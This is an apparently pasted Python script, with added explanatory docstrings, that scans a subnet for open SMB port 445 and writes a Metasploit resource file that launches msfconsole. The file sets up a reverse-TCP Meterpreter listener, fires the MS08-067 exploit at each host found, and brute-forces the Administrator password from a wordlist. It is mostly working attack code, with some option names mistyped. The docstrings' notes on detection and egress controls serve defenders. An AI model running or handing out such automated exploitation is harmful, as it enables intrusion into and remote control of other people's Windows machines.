
Untitled

a guest
May 23rd, 2018
  1. import os
  2. import sys
  3. import argparse
  4. import nmap
  5.  
  6.  
  def findTgts(subnet):
      """Return the hosts in *subnet* that nmap reports with TCP/445 open.

      Only port 445 (SMB) is scanned. On the wire this is a single-port
      sweep across every address in *subnet*, i.e. the horizontal-scan
      pattern that flow monitoring and IDS sweep rules look for.

      Hosts where nmap has no TCP/445 entry, or where the state is anything
      other than 'open', are left out of the result.
      """
      scanner = nmap.PortScanner()
      scanner.scan(subnet, '445')
      return [
          addr
          for addr in scanner.all_hosts()
          if scanner[addr].has_tcp(445)
          and scanner[addr]['tcp'][445]['state'] == 'open'
      ]
  17.  
  def setupHandler(configFile, lhost, lport):
      """Append the listener section of the resource script to *configFile*.

      Six lines are written, in order: select ``exploit/multi/handler``,
      choose the reverse-TCP Meterpreter payload, record *lhost* and *lport*,
      start the handler, and set ``DisablePayloadHandler`` globally.

      *lhost* is concatenated as-is and therefore must already be a string;
      *lport* is passed through ``str()``. The command text is reproduced
      verbatim from the original listing.

      Because the payload is a reverse connection, a host that runs it would
      connect outbound to lhost:lport; egress filtering and alerting on
      unexpected outbound sessions from servers are the relevant controls.
      """
      listener_lines = (
          'use exploit/multi/handler\n',
          'set payload windows/meterpreter/reverse_tcp\n',
          'set lhost=' + lhost + '\n',
          'set lport=' + str(lport) + '\n',
          'exploit -j -z\n',
          'setg DisablePayloadHandler 1\n',
      )
      for line in listener_lines:
          configFile.write(line)
  25.  
  def confickerExploit(configFile,tgtHost,lhost,lport):
      """Append one MS08-067 module section for *tgtHost* to *configFile*.

      The section names ``exploit/windows/smb/ms08_067_netapi``, the same
      reverse-TCP Meterpreter payload used by the listener, and the
      *tgtHost* / *lhost* / *lport* values (each passed through ``str()``).
      The command text is reproduced verbatim from the original listing.

      The module name refers to Microsoft bulletin MS08-067; hosts carrying
      that update, or with TCP/445 unreachable from the scanning segment,
      are outside what this section targets.
      """
      section = (
          'use exploit/windows/smb/ms08_067_netapi\n',
          'set RHOST=' + str(tgtHost) + '\n',
          'set payload windows/meterpreter/reverse_tcp\n',
          'set lhhost=' + str(lhost) + '\n',
          'set lport=' + str(lport) + '\n',
          'exploit -jz\n',
      )
      for line in section:
          configFile.write(line)
  33.  
  def smbBrute(configFile, tgtHost, passFile, lhost, lport):
      """Append one module section per line of *passFile* to *configFile*.

      Every line of the password file (with surrounding '\\n' and then '\\r'
      characters stripped) produces an eight-line section for the fixed
      account name 'Administrator' against *tgtHost*. The command text is
      reproduced verbatim from the original listing.

      On the target, one section per password would surface as a burst of
      SMB logon attempts for a single account from a single source, which
      is what failed-logon auditing and lockout/throttling policies are
      meant to catch.

      The password file handle is opened here and, as in the original, is
      never explicitly closed.
      """
      account = 'Administrator'
      wordlist = open(passFile, 'r')
      for raw in wordlist.readlines():
          # Two separate strips, in this order, exactly as the original does.
          candidate = raw.strip('\n').strip('\r')
          attempt = (
              'use exploit/windows/smb/ps_exec\n',
              'set rhost=' + str(tgtHost) + '\n',
              'set SMBUser=' + str(account) + '\n',
              'set SMBPass' + str(candidate) + '\n',
              'set payload windows/meterpreter/reverse_tcp\n',
              'set lhost=' + str(lhost) + '\n',
              'set lport=' + str(lport) + '\n',
              'exploit -jz\n',
          )
          for line in attempt:
              configFile.write(line)
  47.  
  48.  
  def main():
      """Parse the command line, write ``Conf.rc`` and hand it to msfconsole.

      Flow, as visible in this listing:

      1. ``Conf.rc`` is opened for writing in the current directory before
         any argument is checked, so an existing file is truncated even when
         the run then exits with the usage text.
      2. ``--rhost`` is used as the scan range for ``findTgts``; ``--lhost``
         defaults to 127.0.0.1 and ``--lport`` falls back to '1337'.
      3. The listener section is written once, then one MS08-067 section and
         one password-list section per host found with TCP/445 open.
      4. The file is closed and ``msfconsole -r Conf.rc`` is started through
         ``os.system``.

      Artefacts left on the machine running this: a ``Conf.rc`` file in the
      working directory (it contains every password from the list in clear
      text) and an ``msfconsole`` child process.

      The nesting below is reconstructed; the original paste lost its
      indentation.
      """
      rc_file = open('Conf.rc','w')

      cli = argparse.ArgumentParser(prog='Metasploittest')
      cli.add_argument('-lh','--lhost',help='Your own IP',default='127.0.0.1')
      cli.add_argument('-lp', '--lport',help='Your own Port')
      cli.add_argument('-rh', '--rhost', help='The IP to be attacked')
      cli.add_argument('-pf', '--password', help='The password file to be used')
      opts = cli.parse_args()

      listen_host = opts.lhost
      scan_range = opts.rhost
      wordlist_path = opts.password

      if scan_range is None or listen_host is None or wordlist_path is None:
          # Python 2 print statement: print_help() emits the usage text and
          # returns None, so "None" is printed on the following line.
          print cli.print_help()
          sys.exit(1)

      listen_port = opts.lport if opts.lport is not None else '1337'

      smb_hosts = findTgts(scan_range)
      setupHandler(rc_file,listen_host,listen_port)
      for smb_host in smb_hosts:
          confickerExploit(rc_file,smb_host,listen_host,listen_port)
          # Always true after the guard above; kept to mirror the original.
          if wordlist_path is not None:
              smbBrute(rc_file,smb_host,wordlist_path,listen_host,listen_port)
      rc_file.close()
      os.system('msfconsole -r Conf.rc')
  # Run main() only when executed as a script, not when imported.
  if __name__ == '__main__':
      main()